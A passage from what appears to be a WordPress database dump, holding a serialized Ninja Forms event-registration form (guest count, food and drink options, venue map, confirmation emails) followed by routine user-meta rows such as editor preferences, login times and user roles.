dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:4:\"Four\";s:5:\"value\";s:4:\"four\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:38:\"How many friends will you bring along?\";s:9:\"field_key\";s:37:\"how_many_friends_will_you_bring_along\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:438;a:1:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:5:\"label\";s:22:\"Any food requirements?\";s:3:\"key\";s:21:\"any_food_requirements\";s:4:\"type\";s:9:\"listradio\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Vegan\";s:5:\"value\";s:5:\"vegan\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Vegitarian\";s:5:\"value\";s:10:\"vegetarian\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:11:\"Gluten Free\";s:5:\"value\";s:9:\"no-gluten\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"None\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:22:\"Any food requirements?\";s:9:\"field_key\";s:21:\"any_food_requirements\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:439;a:1:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"10\";s:5:\"label\";s:16:\"Preferred drink?\";s:3:\"key\";s:15:\"preferred_drink\";s:4:\"type\";s:9:\"listradio\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"White wine\";s:5:\"value\";s:10:\"white-wine\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Red wine\";s:5:\"value\";s:8:\"red-wine\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Beer\";s:5:\"value\";s:4:\"beer\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:13:\"No Preference\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:16:\"Preferred drink?\";s:9:\"field_key\";s:15:\"preferred_drink\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:440;a:1:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"11\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_2\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_2\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:441;a:1:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"12\";s:5:\"label\";s:4:\"HTML\";s:3:\"key\";s:4:\"html\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:480:\"<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:4:\"html\";s:14:\"drawerDisabled\";b:0;s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:442;a:1:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"13\";s:5:\"label\";s:8:\"Register\";s:3:\"key\";s:8:\"register\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:8:\"Register\";s:9:\"field_key\";s:8:\"register\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}}s:7:\"actions\";a:4:{i:187;a:1:{s:8:\"settings\";a:33:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:16:\"Store Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}}i:188;a:1:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:23:\"User Email Confirmation\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:13:\"email_message\";s:72:\"<p>Your registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:19:\"email_message_plain\";s:0:\"\";}}i:189;a:1:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:24:\"Admin Email Notification\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:2:\"to\";s:20:\"{system:admin_email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:67:\"<p>Registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:19:\"email_message_plain\";s:0:\"\";}}i:190;a:1:{s:8:\"settings\";a:33:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:15:\"Success Message\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:47:\"<p>Thank you for registering for our event.</p>\";s:9:\"parent_id\";s:2:\"47\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";}}}}'),(1733,5,'hesh_surveyNoticeDismissedB',''),(1734,5,'hesh_theme','wordpress'),(1735,5,'hesh_tabSize','4'),(1736,5,'hesh_lineWrapping','1'),(1737,5,'hesh_lineNumbers','1'),(1738,5,'hesh_fontSize','13'),(1739,5,'hesh_lineHeight','1.5'),(1740,5,'hesh_matchBrackets',''),(1741,5,'hesh_matchTags',''),(1742,5,'hesh_highlightSelectionMatches',''),(1743,5,'hesh_autoCloseTags',''),(1744,5,'hesh_autoCloseBrackets',''),(1745,5,'hesh_foldGutter',''),(1746,5,'hesh_scrollbarStyle',''),(1747,5,'hesh_keyMap','default'),(1748,5,'user_last_view_date','20210717160429'),(1749,5,'user_last_view_date_events','20210717160429'),(1750,5,'bglibDashboardOrder','1'),(1751,5,'wpcl_dashboard_quick_press_last_post_id','269056'),(1752,5,'community-events-location','a:1:{s:2:\"ip\";s:12:\"76.130.120.0\";}'),(1905,5,'first_login','2021-09-07 15:33:40'),(1906,5,'last_login','2021-09-07 15:33:40'),(1907,5,'wfls-last-login','1694806978'),(1908,5,'sgg-tutorial_was_showed','1'),(1925,2,'meta-box-order_mec_calendars','a:3:{s:4:\"side\";s:57:\"submitdiv,mec_calendar_search_form,mec_calendar_shortcode\";s:6:\"normal\";s:56:\"mec_calendar_display_options,mec_calendar_filter,slugdiv\";s:8:\"advanced\";s:0:\"\";}'),(1926,2,'screen_layout_mec_calendars','2'),(2058,2,'wpdeveloper_notices_seen','a:1:{s:24:\"wpdeveloper_notice_1_9_5\";a:1:{s:10:\"betterdocs\";a:1:{i:0;s:14:\"update_10kuser\";}}}'),(2159,2,'closedpostboxes_bg_block','a:0:{}'),(2160,2,'metaboxhidden_bg_block','a:0:{}'),(2266,15,'nickname','john-admin-96'),(2267,15,'first_name',''),(2268,15,'last_name',''),(2269,15,'description',''),(2270,15,'rich_editing','true'),(2271,15,'syntax_highlighting','true'),(2272,15,'comment_shortcuts','false'),(2273,15,'admin_color','fresh'),(2274,15,'use_ssl','0'),(2275,15,'show_admin_bar_front','true'),(2276,15,'locale',''),(2277,15,'wpcl_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(2278,15,'wpcl_user_level','10'),(2279,15,'dismissed_wp_pointers',',wp410_dfw'),(2282,15,'first_login','2022-01-07 19:59:47'),(2283,15,'last_login','2022-07-29 